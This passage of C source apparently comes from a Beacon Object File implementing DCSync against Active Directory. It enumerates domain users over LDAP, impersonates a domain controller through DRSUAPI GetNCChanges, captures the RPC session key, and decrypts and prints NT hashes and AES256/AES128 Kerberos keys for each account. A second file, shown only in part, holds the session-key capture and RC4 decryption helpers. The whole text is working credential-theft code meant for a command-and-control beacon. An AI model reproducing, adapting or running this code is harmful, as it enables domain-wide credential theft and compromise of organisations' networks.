    for (DWORD i = descriptorStart + 20; i + searchUTF16Len <= propertyLen; i++) {
        BOOL match = TRUE;
        for (DWORD j = 0; j < searchUTF16Len; j++) {
            BYTE propertyByte = propertyData[i + j];
            BYTE searchByte = searchUTF16[j];
            
            // Case-insensitive comparison for ASCII letters in UTF-16LE (even positions only)
            if (j % 2 == 0) {
                // Convert to uppercase for comparison
                if (propertyByte >= 'a' && propertyByte <= 'z') propertyByte -= ('a' - 'A');
                if (searchByte >= 'a' && searchByte <= 'z') searchByte -= ('a' - 'A');
            }
            
            if (propertyByte != searchByte) {
                match = FALSE;
                break;
            }
        }
        if (match) {
            matchOffset = i;
            break;
        }
    }
    
    if (matchOffset == 0xFFFFFFFF) return FALSE;
    
    // Calculate salt boundaries
    DWORD saltEnd = matchOffset + searchUTF16Len;
    
    // Need at least 48 bytes for AES256 (32) + AES128 (16)
    if (propertyLen - saltEnd < 48) {
        return FALSE;
    }
    
    // Keys are stored after salt as raw binary data
    DWORD scanStart = saltEnd;
    
    for (DWORD tryOffset = scanStart; tryOffset + 48 <= propertyLen; tryOffset++) {
        // Check if this looks like binary key data vs UTF-16LE text
        DWORD zeroCount = 0;
        DWORD evenZeros = 0;   // Zeros at even positions (0, 2, 4...)
        DWORD oddZeros = 0;    // Zeros at odd positions (1, 3, 5...)
        DWORD highBitCount = 0; // Bytes >= 0x80
        
        for (DWORD i = 0; i < 48; i++) {
            BYTE b = propertyData[tryOffset + i];
            if (b == 0x00) {
                zeroCount++;
                if (i % 2 == 0) evenZeros++;
                else oddZeros++;
            }
            if (b >= 0x80) highBitCount++;
        }
        
        // Skip if this looks like UTF-16LE text
        // User account keys may have more zeros than machine/trust keys
        // Be less strict for better compatibility
        if (oddZeros > 5) continue;  // Too many odd zeros = UTF-16LE pattern  
        if (zeroCount > 30) continue;  // More than 62% zeros = likely padding
        if (highBitCount < 5) continue;  // Need some high-bit bytes for randomness
        
        // This looks like binary data - validate entropy
        char tempAES256[65] = {0};
        char tempAES128[33] = {0};
        BytesToHex(propertyData + tryOffset, 32, tempAES256);
        BytesToHex(propertyData + tryOffset + 32, 16, tempAES128);
        
        // Check for good entropy (not all same characters)
        DWORD sameCount256 = 0, sameCount128 = 0;
        for (int i = 1; i < 64; i++) {
            if (tempAES256[i] == tempAES256[i-1]) sameCount256++;
        }
        for (int i = 1; i < 32; i++) {
            if (tempAES128[i] == tempAES128[i-1]) sameCount128++;
        }
        if (sameCount256 > 50 || sameCount128 > 25) continue;
        
        // Found valid keys
        if (aes256Out) MSVCRT$memcpy(aes256Out, tempAES256, 65);
        if (aes128Out) MSVCRT$memcpy(aes128Out, tempAES128, 33);
        return TRUE;
    }
    
    return FALSE;
}

void InitDRSRequest(DRS_MSG_GETCHGREQ* request, const GUID* dcGuid, DSNAME* targetDsname) {
    if (!request) return;
    
    MSVCRT$memset(request, 0, sizeof(DRS_MSG_GETCHGREQ));
    
    if (dcGuid) {
        MSVCRT$memcpy(&request->V8.uuidDsaObjDest, dcGuid, sizeof(GUID));
    }
    
    request->V8.pNC = targetDsname;
    MSVCRT$memset(&request->V8.uuidInvocIdSrc, 0, sizeof(UUID));
    MSVCRT$memset(&request->V8.usnvecFrom, 0, sizeof(USN_VECTOR));
    request->V8.pUpToDateVecDest = NULL;
    request->V8.ulFlags = DRS_INIT_SYNC | DRS_WRIT_REP | DRS_NEVER_SYNCED | DRS_FULL_SYNC_NOW | DRS_SYNC_URGENT;
    request->V8.cMaxObjects = 1;
    request->V8.cMaxBytes = 0xA00000;
    request->V8.ulExtendedOp = EXOP_REPL_OBJ;
    MSVCRT$memset(&request->V8.liFsmoInfo, 0, sizeof(ULARGE_INTEGER));
    request->V8.pPartialAttrSet = NULL;
    request->V8.pPartialAttrSetEx = NULL;
    request->V8.PrefixTableDest.PrefixCount = 0;
    request->V8.PrefixTableDest.pPrefixEntry = NULL;
}

DSNAME* BuildDSName(const char* dn, const GUID* guid) {
    if (!dn) return NULL;
    
    size_t dnLen = MSVCRT$strlen(dn);
    if (dnLen > 4096) return NULL; // Sanity check
    wchar_t* wDn = CharToWChar(dn);
    if (!wDn) return NULL;
    
    size_t wDnLen = 0;
    while (wDn[wDnLen] != 0) wDnLen++;
    
    // Calculate structure size properly using FIELD_OFFSET
    // DSNAME has: structLen, SidLen, Guid, Sid (28 bytes), NameLen, StringName[1]
    // We need: base structure + space for (wDnLen) wide chars (StringName[1] already counts for 1)
    // NOTE: structLen should include the null terminator
    DWORD structLen = (DWORD)(sizeof(DSNAME) - sizeof(WCHAR) + ((wDnLen + 1) * sizeof(WCHAR)));
    
    DSNAME* dsname = (DSNAME*)MSVCRT$malloc(structLen);
    if (!dsname) {
        MSVCRT$free(wDn);
        return NULL;
    }
    
    MSVCRT$memset(dsname, 0, structLen);
    dsname->structLen = structLen;
    dsname->NameLen = (DWORD)wDnLen;  // Length WITHOUT null terminator
    dsname->SidLen = 0;  // Not providing SID
    
    // Copy GUID if provided
    if (guid) {
        MSVCRT$memcpy(&dsname->Guid, guid, sizeof(GUID));
    } else {
        MSVCRT$memset(&dsname->Guid, 0, sizeof(GUID));
    }
    
    // Copy the wide string DN (including null terminator)
    for (size_t i = 0; i <= wDnLen; i++) {  // <= to include null terminator
        dsname->StringName[i] = wDn[i];
    }
    
    MSVCRT$free(wDn);
    return dsname;
}

RPC_BINDING_HANDLE CreateDRSBinding(const char* dcHostname) {
    RPC_BINDING_HANDLE binding = NULL;
    unsigned char* stringBinding = NULL;
    RPC_STATUS status;
    
    // Build RPC string binding for DRSUAPI
    // Format: ncacn_ip_tcp:hostname[endpoint]
    status = RPCRT4$RpcStringBindingComposeA(
        NULL,                           // Object UUID
        (unsigned char*)"ncacn_ip_tcp", // Protocol sequence
        (unsigned char*)dcHostname,     // Network address
        NULL,                           // Use dynamic endpoint
        NULL,                           // No options
        &stringBinding
    );
    
    if (status != RPC_S_OK) {
        ERROR_PRINT( "[-] Failed to compose RPC string binding: 0x%x", status);
        return NULL;
    }
    
    // Create binding handle
    status = RPCRT4$RpcBindingFromStringBindingA(stringBinding, &binding);
    RPCRT4$RpcStringFreeA(&stringBinding);
    
    if (status != RPC_S_OK) {
        ERROR_PRINT( "[-] Failed to create RPC binding: 0x%x", status);
        return NULL;
    }
    
    // Set authentication info (use Kerberos/NTLM via NEGOTIATE)
    // Use NULL for SPN to let RPC determine the correct service principal
    status = RPCRT4$RpcBindingSetAuthInfoA(
        binding,
        NULL,                           // Let RPC determine SPN
        RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
        RPC_C_AUTHN_GSS_NEGOTIATE,
        NULL,                           // Use current credentials
        RPC_C_AUTHZ_NAME
    );
    
    if (status != RPC_S_OK) {
        ERROR_PRINT( "[-] Failed to set RPC auth info: 0x%x", status);
        RPCRT4$RpcBindingFree(&binding);
        return NULL;
    }
    
    // Register security callback to capture session key during authentication
    status = RPCRT4$RpcBindingSetOption(binding, RPC_C_OPT_SECURITY_CALLBACK, (ULONG_PTR)RpcSecurityCallback);
    if (status != RPC_S_OK) {
        ERROR_PRINT( "[-] Failed to set security callback: 0x%x", status);
        RPCRT4$RpcBindingFree(&binding);
        return NULL;
    }

    return binding;
}

DRS_HANDLE BindToDRS(RPC_BINDING_HANDLE rpcBinding) {
    DRS_HANDLE drsHandle = NULL;
    DRS_EXTENSIONS_INT* extClient = NULL;
    DRS_EXTENSIONS_INT* extServer = NULL;
    UUID clientDsaUuid;
    ULONG result;
    
    // Generate a random client DSA UUID
    RPCRT4$UuidCreate(&clientDsaUuid);
    
    // Create DRS_EXTENSIONS_INT structure like mimikatz
    extClient = (DRS_EXTENSIONS_INT*)MSVCRT$malloc(sizeof(DRS_EXTENSIONS_INT));
    if (!extClient) {
        return NULL;
    }
    MSVCRT$memset(extClient, 0, sizeof(DRS_EXTENSIONS_INT));
    
    extClient->cb = sizeof(DRS_EXTENSIONS_INT);
    extClient->dwFlags = 0x1FFFFFFF;  // All modern capabilities
    extClient->Pid = 0;
    extClient->dwReplEpoch = 0;
    
    // Call IDL_DRSBind - using the Microsoft RPC stub
    result = IDL_DRSBind(
        rpcBinding,
        &clientDsaUuid,
        extClient,
        &extServer,
        &drsHandle
    );
    
    MSVCRT$free(extClient);
    MSVCRT$free(extServer);
    
    if (result != 0) {
        ERROR_PRINT( "[-] DRSBind failed: 0x%x", result);
        return NULL;
    }

    return drsHandle;
}

DWORD GetRIDFromSID(const BYTE* sid, DWORD sidLen) {
    if (!sid || sidLen < 12) return 0;
    
    // SID structure: Revision (1) + SubAuthCount (1) + Authority (6) + SubAuths (4 * count)
    // RID is the last SubAuth value
    BYTE subAuthCount = sid[1];
    if (sidLen < (8 + (subAuthCount * 4))) return 0;
    
    DWORD offset = 8 + ((subAuthCount - 1) * 4);
    DWORD rid = *(DWORD*)(sid + offset);
    
    return rid;
}

void ProcessCredentials(REPLENTINFLIST* objects, const char* samAccountName, const char* distinguishedName, const char* dcHostname, const BYTE* sessionKey, DWORD sessionKeyLen, int onlyNT) {
    if (!objects) return;
    
    char ntHash[33] = {0};
    char lmHash[33] = {0};
    char aes256Key[65] = {0};
    char aes128Key[33] = {0};
    BOOL foundNT = FALSE;
    BOOL foundLM = FALSE;
    BOOL foundAES256 = FALSE;
    BOOL foundAES128 = FALSE;
    DWORD userRID = 0;
    DWORD accountType = SAM_USER_OBJECT;  // Default to user account
    
    // Iterate through returned objects
    REPLENTINFLIST* current = objects;
    while (current) {
        ENTINF* entinf = &current->Entinf;
        ATTRBLOCK* attrBlock = &entinf->AttrBlock;
        
        // FIRST PASS: Extract RID and account type (needed for decryption and salt construction)
        for (ULONG i = 0; i < attrBlock->attrCount; i++) {
            ATTR* attr = &attrBlock->pAttr[i];
            ATTRTYP attrType = attr->attrTyp;
            
            if (attrType == ATT_OBJECT_SID && attr->AttrVal.valCount > 0) {
                ATTRVAL* val = &attr->AttrVal.pAVal[0];
                userRID = GetRIDFromSID(val->pVal, val->valLen);
            }
            else if (attrType == ATT_SAM_ACCOUNT_TYPE && attr->AttrVal.valCount > 0) {
                ATTRVAL* val = &attr->AttrVal.pAVal[0];
                if (val->valLen == 4) {
                    accountType = *(DWORD*)(val->pVal);
                }
            }
        }
        
        // SECOND PASS: Process all attributes with correct RID
        for (ULONG i = 0; i < attrBlock->attrCount; i++) {
            ATTR* attr = &attrBlock->pAttr[i];
            ATTRTYP attrType = attr->attrTyp;
            
            // NT hash (unicodePwd) - ATTRTYP should be 0x9005A
            if (attrType == ATT_UNICODE_PWD && attr->AttrVal.valCount > 0) {
                ATTRVAL* val = &attr->AttrVal.pAVal[0];
                
                // Modern AD uses encrypted blob format with structure:
                // For 36 bytes: [4 byte header] + [16 byte salt] + [16 byte encrypted hash]
                // For 20 bytes: [4 byte header] + [16 byte encrypted hash]  
                // For 16 bytes: [16 byte encrypted hash] (simple RC4)
                
                if (val->valLen == 16) {
                    BYTE decrypted[16];
                    BYTE ridBytes[4];
                    *(DWORD*)ridBytes = userRID;
                    
                    if (DecryptRC4(val->pVal, 16, ridBytes, decrypted)) {
                        BytesToHex(decrypted, 16, ntHash);
                        foundNT = TRUE;
                    }
                } else if (val->valLen == 20) {
                    BYTE decrypted[16];
                    BYTE ridBytes[4];
                    *(DWORD*)ridBytes = userRID;
                    
                    if (DecryptRC4(val->pVal + 4, 16, ridBytes, decrypted)) {
                        BytesToHex(decrypted, 16, ntHash);
                        foundNT = TRUE;
                    }
                } else if (val->valLen == 36 || val->valLen == 40) {
                    BYTE decrypted[32];
                    BOOL decryptSuccess = FALSE;
                    BYTE ridBytes[4];
                    *(DWORD*)ridBytes = userRID;
                    
                    if (sessionKey && sessionKeyLen > 0) {
                        DWORD outputLen = 0;
                        BYTE sessionDecrypted[32];
                        if (DecryptWithSessionKey(val->pVal, val->valLen, sessionKey, sessionKeyLen, sessionDecrypted, &outputLen)) {
                            if (outputLen >= 16) {
                                BYTE ridDecrypted[16];
                                if (DecryptDESWithRid(sessionDecrypted, userRID, ridDecrypted)) {
                                    MSVCRT$memcpy(decrypted, ridDecrypted, 16);
                                    BytesToHex(decrypted, 16, ntHash);
                                    foundNT = TRUE;
                                    decryptSuccess = TRUE;
                                }
                            }
                        }
                    }
                    
                    if (!decryptSuccess) {
                        BYTE ridDecrypted[16];
                        if (DecryptRC4(val->pVal + 20, 16, ridBytes, ridDecrypted) && ridDecrypted[0] != 0 && ridDecrypted[0] != 0xFF) {
                            BytesToHex(ridDecrypted, 16, ntHash);
                            foundNT = TRUE;
                            decryptSuccess = TRUE;
                        }
                    }
                    
                    if (!decryptSuccess) {
                        BYTE ridDecrypted[16];
                        if (DecryptRC4(val->pVal + 4, 16, ridBytes, ridDecrypted) && ridDecrypted[0] != 0 && ridDecrypted[0] != 0xFF) {
                            BytesToHex(ridDecrypted, 16, ntHash);
                            foundNT = TRUE;
                            decryptSuccess = TRUE;
                        }
                    }
                    
                    if (!decryptSuccess && DecryptRC4(val->pVal, 16, ridBytes, decrypted) && decrypted[0] != 0 && decrypted[0] != 0xFF) {
                        BytesToHex(decrypted, 16, ntHash);
                        foundNT = TRUE;
                        decryptSuccess = TRUE;
                    }
                }
            }
            
            if (attrType == 0x9007D && attr->AttrVal.valCount > 0) {
                ATTRVAL* val = &attr->AttrVal.pAVal[0];
                if (val->valLen > 65536) continue; // Sanity check
                BYTE* decrypted = (BYTE*)MSVCRT$malloc(val->valLen);
                if (!decrypted) continue;
                {
                    BYTE ridBytes[4];
                    *(DWORD*)ridBytes = userRID;
                    
                    BOOL decryptSuccess = FALSE;
                    
                    if (sessionKey && sessionKeyLen > 0 && val->valLen > 108) {
                        DWORD sessionDecryptedLen = 0;
                        BYTE* sessionDecrypted = (BYTE*)MSVCRT$malloc(val->valLen);
                        if (!sessionDecrypted) {
                            MSVCRT$free(decrypted);
                            continue;
                        }
                        
                        if (DecryptWithSessionKey(val->pVal, val->valLen, sessionKey, sessionKeyLen, sessionDecrypted, &sessionDecryptedLen)) {
                            MSVCRT$memcpy(decrypted, sessionDecrypted, sessionDecryptedLen);
                            decryptSuccess = TRUE;
                        }
                        
                        if (sessionDecrypted) MSVCRT$free(sessionDecrypted);
                    }
                    
                    if (!decryptSuccess) {
                        if (DecryptRC4(val->pVal, val->valLen, ridBytes, decrypted)) {
                            decryptSuccess = TRUE;
                        }
                    }
                    
                    if (decryptSuccess) {
                        // USER_PROPERTIES structure:
                        // typedef struct _USER_PROPERTIES {
                        //   DWORD Reserved1;         // offset 0 (4 bytes) - should be 0
                        //   DWORD Length;            // offset 4 (4 bytes) - length of UserProperties data
                        //   WORD Reserved2;          // offset 8 (2 bytes)
                        //   WORD Reserved3;          // offset 10 (2 bytes)
                        //   BYTE Reserved4[96];      // offset 12-107 (96 bytes)
                        //   BYTE UserProperties[1];  // offset 108+
                        // } USER_PROPERTIES;
                        
                        if (val->valLen < 108) {
                            ERROR_PRINT( "[!] Buffer too small for USER_PROPERTIES");
                            MSVCRT$free(decrypted);
                            continue;
                        }
                        
                        DWORD* pLength = (DWORD*)(decrypted + 4);
                        BYTE* propertyData = decrypted + 108;
                        DWORD propertyLen = val->valLen - 108;
                        
                        if (*pLength > 0 && *pLength <= (val->valLen - 108)) {
                            propertyLen = *pLength;
                        }
                        
                        for (DWORD i = 0; i < propertyLen - 40; i++) {
                            if (propertyData[i] == 'P' && propertyData[i+1] == 0x00 &&
                                propertyData[i+2] == 'r' && propertyData[i+3] == 0x00 &&
                                propertyData[i+4] == 'i' && propertyData[i+5] == 0x00 &&
                                propertyData[i+6] == 'm' && propertyData[i+7] == 0x00) {
                                
                                char packageName[128] = {0};
                                int nameIdx = 0;
                                for (int j = 0; j < 200 && (i + j) < propertyLen && nameIdx < 127; j += 2) {
                                    BYTE ch = propertyData[i + j];
                                    BYTE null = propertyData[i + j + 1];
                                    
                                    if (ch == 0 && null == 0) break;
                                    if (null != 0) break;
                                    if (ch < 0x20 || ch > 0x7E) break;
                                    
                                    packageName[nameIdx++] = ch;
                                }
                                packageName[nameIdx] = '\0';
                                
                                if (nameIdx > 8 && MSVCRT$strstr(packageName, "Kerberos")) {
                                    DWORD dataStart = i + (nameIdx * 2) + 2;
                                    if (dataStart >= propertyLen) break;
                                    DWORD remainingLen = propertyLen - dataStart;
                                    if (remainingLen > 32768) break; // Sanity check
                                    
                                    BYTE* decodedValue = (BYTE*)MSVCRT$malloc(remainingLen / 2 + 1);
                                    if (!decodedValue) break;
                                    {
                                        DWORD decodedLen = HexToBinary(propertyData + dataStart, remainingLen, decodedValue);
                                        
                                        if (decodedLen > 0) {
                                            if (ParseKerberosKeys(decodedValue, decodedLen, samAccountName, dcHostname, accountType, aes256Key, aes128Key)) {
                                                if (aes256Key[0] != '\0') foundAES256 = TRUE;
                                                if (aes128Key[0] != '\0') foundAES128 = TRUE;
                                            }
                                        }
                                        
                                        MSVCRT$free(decodedValue);
                                    }
                                }
                            }
                        }
                    }
                    
                    MSVCRT$free(decrypted);
                }
            }
        }
        
        current = current->pNextEntInf;
    }

    // Extract domain from DN (DC=child,DC=contoso,DC=local -> child.contoso.local)
    char domainName[256] = {0};
    DWORD domainLen = 0;
    if (distinguishedName) {
        const char* p = distinguishedName;
        while (*p) {
            // Find "DC=" or "dc="
            if ((p[0] == 'D' || p[0] == 'd') && (p[1] == 'C' || p[1] == 'c') && p[2] == '=') {
                p += 3; // Skip "DC="
                // Add separator if not first component
                if (domainLen > 0 && domainLen < 255) {
                    domainName[domainLen++] = '.';
                }
                // Copy until comma or end
                while (*p && *p != ',' && domainLen < 255) {
                    domainName[domainLen++] = *p++;
                }
            } else {
                p++;
            }
        }
        domainName[domainLen] = '\0';
    }
    
    if (accountType == SAM_USER_OBJECT) {
        if (domainLen > 0)
            OUTPUT_PRINT("\n[*] User: %s\\%s", domainName, samAccountName);
        else
            OUTPUT_PRINT("\n[*] User: %s", samAccountName);
    } else if (accountType == SAM_MACHINE_ACCOUNT) {
        if (domainLen > 0)
            OUTPUT_PRINT("\n[*] Computer: %s\\%s", domainName, samAccountName);
        else
            OUTPUT_PRINT("\n[*] Computer: %s", samAccountName);
    } else if (accountType == SAM_TRUST_ACCOUNT) {
        if (domainLen > 0)
            OUTPUT_PRINT("\n[*] Trust account: %s\\%s", domainName, samAccountName);
        else
            OUTPUT_PRINT("\n[*] Trust account: %s", samAccountName);
    } else {
        if (domainLen > 0)
            OUTPUT_PRINT("\n[*] Object: %s\\%s", domainName, samAccountName);
        else
            OUTPUT_PRINT("\n[*] Object: %s", samAccountName);
    }

    // OUTPUT_PRINT("  %s", samAccountName);
    if (foundNT) OUTPUT_PRINT("  nt:\t%s", ntHash);
    if (!onlyNT) {
        if (foundAES256) OUTPUT_PRINT("  aes256:\t%s", aes256Key);
        if (foundAES128) OUTPUT_PRINT("  aes128:\t%s", aes128Key);
    }
}

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);
    
    // Parse arguments
    char* ouPath = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);
    int onlyNT = BeaconDataInt(&parser);
    int onlyUsers = BeaconDataInt(&parser);

    // Variables for cleanup
    RPC_BINDING_HANDLE rpcBinding = NULL;
    DRS_HANDLE drsHandle = NULL;
    PARTIAL_ATTR_VECTOR_V1_EXT* pPartialAttrSet = NULL;
    PrefixTableEntry* prefixEntries = NULL;
    unsigned char* oidCopies[10];  // Array to hold OID pointers for prefix table
    DWORD oidCopyCount = 0;  // Track how many OIDs were allocated
    char* dcHostname = NULL;
    LDAP* ld = NULL;
    DC_CONTEXT* dcContext = NULL;
    USER_INFO* users = NULL;
    int userCount = 0;
    
    // Initialize OID array
    MSVCRT$memset(oidCopies, 0, sizeof(oidCopies));
    
    // Initialize LDAP connection
    ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        ERROR_PRINT( "[-] Failed to initialize LDAP");
        return;
    }
    
    // Get DC context (defaultNamingContext + DC GUID)
    dcContext = GetDCContext(ld, dcHostname);
    if (!dcContext) {
        ERROR_PRINT( "[-] Failed to get DC context");
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }
    
    // Enumerate all users in the domain
    char* searchBase = (ouPath && MSVCRT$strlen(ouPath) > 0) ? ouPath : dcContext->defaultNamingContext;
    users = EnumerateAllUsers(ld, searchBase, &userCount, onlyUsers);
    
    if (!users || userCount == 0) {
        ERROR_PRINT( "[-] No users found to sync");
        FreeDCContext(dcContext);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    // Done with LDAP
    CleanupLDAP(ld);
    
    // Create RPC binding to DRSUAPI
    rpcBinding = CreateDRSBinding(dcHostname);
    if (!rpcBinding) {
        ERROR_PRINT( "[-] Failed to create DRSUAPI binding");
        FreeUserInfoArray(users, userCount);
        FreeDCContext(dcContext);
        if (dcHostname) MSVCRT$free(dcHostname);
        return;
    }
    
    // Bind to DRS interface
    drsHandle = BindToDRS(rpcBinding);
    if (!drsHandle) {
        RPCRT4$RpcBindingFree(&rpcBinding);
        FreeUserInfoArray(users, userCount);
        FreeDCContext(dcContext);
        if (dcHostname) MSVCRT$free(dcHostname);
        return;
    }
    
    OUTPUT_PRINT("\n[*] Starting DCSync for %d objects...\n", userCount);
    
    // Loop through all users and perform DCSync
    for (int i = 0; i < userCount; i++) {
        DSNAME* targetDsname = NULL;
        BYTE* sessionKey = NULL;
        DWORD sessionKeyLen = 0;
        
        // Reset session key capture for each user
        g_SessionKeyCapturing = 0;
        g_SessionKeyCopyLen = 0;
        MSVCRT$memset(g_SessionKeyCopy, 0, sizeof(g_SessionKeyCopy));
        
        // Build DSNAME for the target object with GUID
        targetDsname = BuildDSName(users[i].distinguishedName, &users[i].objectGuid);
        
        if (!targetDsname) {
            ERROR_PRINT( "[-] Failed to build DSNAME structure for %s", users[i].samAccountName);
            continue;
        }
        
        // Prepare GetNCChanges request (V8)
        DRS_MSG_GETCHGREQ request;
        InitDRSRequest(&request, &dcContext->dcObjectGuid, targetDsname);
        
        // Disabling this for the all users version, it's probably unnecessary
        //KERNEL32$Sleep(100); // Small delay for drs response and session key syncing

        // Make the DRSGetNCChanges call
        DWORD outVersion = 0;
        DRS_MSG_GETCHGREPLY reply;
        MSVCRT$memset(&reply, 0, sizeof(reply));
        
        // Using V8 request (gets V1 or V6 reply)
        ULONG result = IDL_DRSGetNCChanges(
            drsHandle,
            8,
            &request,
            &outVersion,
            &reply
        );
        
        if (result != 0) {
            ERROR_PRINT( "[-] DRSGetNCChanges failed for %s: 0x%x (%u)", users[i].samAccountName, result, result);
            MSVCRT$free(targetDsname);
            continue;
        }
        
        // Copy session key from callback's static buffer (if captured)
        if (g_SessionKeyCopyLen > 0 && g_SessionKeyCopyLen <= 256) {
            sessionKey = (BYTE*)MSVCRT$malloc(g_SessionKeyCopyLen);
            if (sessionKey) {
                MSVCRT$memcpy(sessionKey, g_SessionKeyCopy, g_SessionKeyCopyLen);
                sessionKeyLen = g_SessionKeyCopyLen;
            }
        }
        
        // Process the reply based on version - access correct union member
        REPLENTINFLIST* objects = NULL;

        switch (outVersion) {
            case 1:
                objects = reply.V1.pObjects;
                break;
            case 6:
            case 7:
            case 9:
                objects = reply.V6.pObjects;  // V6 structure
                break;
            default:
                ERROR_PRINT( "[!] Unexpected reply version for %s: %u", users[i].samAccountName, outVersion);
                if (sessionKey) MSVCRT$free(sessionKey);
                MSVCRT$free(targetDsname);
                continue;
        }

        // Process and decrypt credentials
        if (objects) {
            ProcessCredentials(objects, users[i].samAccountName, users[i].distinguishedName, dcHostname, sessionKey, sessionKeyLen, onlyNT);
        }
        
        // Cleanup for this user
        if (sessionKey) {
            MSVCRT$free(sessionKey);
        }
        MSVCRT$free(targetDsname);
    }
    
    OUTPUT_PRINT("\n[+] DCSync complete for %d objects", userCount);
    
    // Cleanup
    if (drsHandle) IDL_DRSUnbind(&drsHandle);
    if (rpcBinding) RPCRT4$RpcBindingFree(&rpcBinding);
    if (pPartialAttrSet) MSVCRT$free(pPartialAttrSet);

    // Free all OID copies
    for (DWORD i = 0; i < oidCopyCount; i++) {
        if (oidCopies[i]) MSVCRT$free(oidCopies[i]);
    }
    
    if (prefixEntries) MSVCRT$free(prefixEntries);
    FreeUserInfoArray(users, userCount);
    FreeDCContext(dcContext);
    if (dcHostname) MSVCRT$free(dcHostname);
}

================================================
FILE: AD-BOF/DCSync-BOF/src/dcsync-single.c
================================================
#include "../_include/dcsync.h"
#include "../_include/beacon.h"

#include "../util/ldap_common.c"


void BytesToHex(const BYTE* bytes, DWORD len, char* output) {
    const char* hexChars = "0123456789abcdef";
    for (DWORD i = 0; i < len; i++) {
        output[i * 2] = hexChars[(bytes[i] >> 4) & 0xF];
        output[i * 2 + 1] = hexChars[bytes[i] & 0xF];
    }
    output[len * 2] = '\0';
}

// Session key captured by callback - one-time copy only
static BYTE g_SessionKeyCopy[256] = {0};
static DWORD g_SessionKeyCopyLen = 0;
static volatile LONG g_SessionKeyCapturing = 0;

void RPC_ENTRY RpcSecurityCallback(void *Context) {
    // Atomic check-and-set: only one thread can pass this
    if (InterlockedCompareExchange(&g_SessionKeyCapturing, 1, 0) != 0) {
        return; // Another thread is already capturing or has captured
    }
    
    PCtxtHandle pSecurityContext = NULL;
    SecPkgContext_SessionKey sessionKey = {0, NULL};
    
    if (RPCRT4$I_RpcBindingInqSecurityContext(Context, (void**)&pSecurityContext) != RPC_S_OK || !pSecurityContext) {
        return;
    }
    
    if (SECUR32$QueryContextAttributesA(pSecurityContext, SECPKG_ATTR_SESSION_KEY, &sessionKey) == SEC_E_OK &&
        sessionKey.SessionKeyLength > 0 && sessionKey.SessionKeyLength <= 256 && sessionKey.SessionKey) {
        
        // Copy session key to static buffer
        MSVCRT$memcpy(g_SessionKeyCopy, sessionKey.SessionKey, sessionKey.SessionKeyLength);
        g_SessionKeyCopyLen = sessionKey.SessionKeyLength;
        
        SECUR32$FreeContextBuffer(sessionKey.SessionKey);
    }
}

BOOL DecryptWithSessionKey(const BYTE* encryptedData, DWORD encryptedLen, const BYTE* sessionKey, DWORD sessionKeyLen, BYTE* output, DWORD* outputLen) {
    if (!encryptedData || !sessionKey || !output || encryptedLen < 20) {
        return FALSE;
    }
    
    const BYTE* salt = encryptedData;
    const BYTE* encPayload = encryptedData + 16;
    DWORD encPayloadLen = encryptedLen - 16;
    
    HCRYPTPROV hProv = 0;
    HCRYPTHASH hHash = 0;
    BYTE derivedKey[16];
    DWORD derivedKeyLen = 16;
    
    if (!ADVAPI32$CryptAcquireContextA(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT) ||
        !ADVAPI32$CryptCreateHash(hProv, CALG_MD5, 0, 0, &hHash)) {
        if (hProv) ADVAPI32$CryptReleaseContext(hProv, 0);
        return FALSE;
    }
    
    ADVAPI32$CryptHashData(hHash, sessionKey, sessionKeyLen, 0);
    ADVAPI32$CryptHashData(hHash, salt, 16, 0);
    
    if (!ADVAPI32$CryptGetHashParam(hHash, HP_HASHVAL, derivedKey, &derivedKeyLen, 0)) {
        ADVAPI32$CryptDestroyHash(hHash);
        ADVAPI32$CryptReleaseContext(hProv, 0);
        return FALSE;
    }
    
    ADVAPI32$CryptDestroyHash(hHash);
    ADVAPI32$CryptReleaseContext(hProv, 0);

    BYTE* tempOutput = (BYTE*)MSVCRT$malloc(encPayloadLen);
    if (!tempOutput) {
        return FALSE;
    }
    
    BOOL result = DecryptRC4WithRawKey(encPayload, encPayloadLen, derivedKey, 16, tempOutput);
    
    if (result && encPayloadLen > 4) {
            DWORD receivedChecksum = *(DWORD*)tempOutput;
            DWORD realDataLen = encPayloadLen - 4;
            BYTE* realData = tempOutput + 4;
            
            DWORD calculatedChecksum = 0xFFFFFFFF;  
            for (DWORD i = 0; i < realDataLen; i++) {
                DWORD byte = realData[i];
                calculatedChecksum = calculatedChecksum ^ byte;
                for (int j = 0; j < 8; j++) {
                    DWORD mask = -(calculatedChecksum & 1);
                    calculatedChecksum = (calculatedChecksum >> 1) ^ (0xEDB88320 & mask);
                }
            }
            calculatedChecksum = ~calculatedChecksum;
            
            if (receivedChecksum == calculatedChecksum && outputLen) {
                MSVCRT$memcpy(output, realData, realDataLen);
                *outputLen = realDataLen;
            } else {
                result = FALSE;
            }
    } else {
        result = FALSE;
    }
    
    MSVCRT$free(tempOutput);
    return result;
}

BOOL DecryptRC4WithRawKey(const BYTE* encData, DWORD encLen, const BYTE* key, DWORD keyLen, BYTE* output) {
    HCRYPTPROV hProv = 0;
    HCRYPTKEY hKey = 0;
    BOOL success = FALSE;
    
    if (!ADVAPI32$CryptAcquireContextA(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        return FALSE;
    }
    
    struct {
        BLOBHEADER hdr;
        DWORD keySize;
        BYTE keyBytes[16];
    } keyBlob;
    
    keyBlob.hdr.bType = PLAINTEXTKEYBLOB;
    keyBlob.hdr.bVersion = CUR_BLOB_VERSION;
    keyBlob.hdr.reserved = 0;
    keyBlob.hdr.aiKeyAlg = CALG_RC4;
    keyBlob.keySize = keyLen;
    MSVCRT$memcpy(keyBlob.keyBytes, key, keyLen);
    
    if (!ADVAPI32$CryptImportKey(hProv, (BYTE*)&keyBlob, sizeof(BLOBHEADER) + sizeof(DWORD) + keyLen, 0, 0, &hKey)) {
        ADVAPI32$CryptReleaseContext(hProv, 0);
        return FALSE;
    }
    
    MSVCRT$memcpy(output, encData, encLen);
    
    DWORD dataLen = encLen;
    if (ADVAPI32$CryptDecrypt(hKey, 0, TRUE, 0, output, &dataLen)) {
        success = TRUE;
    }
    
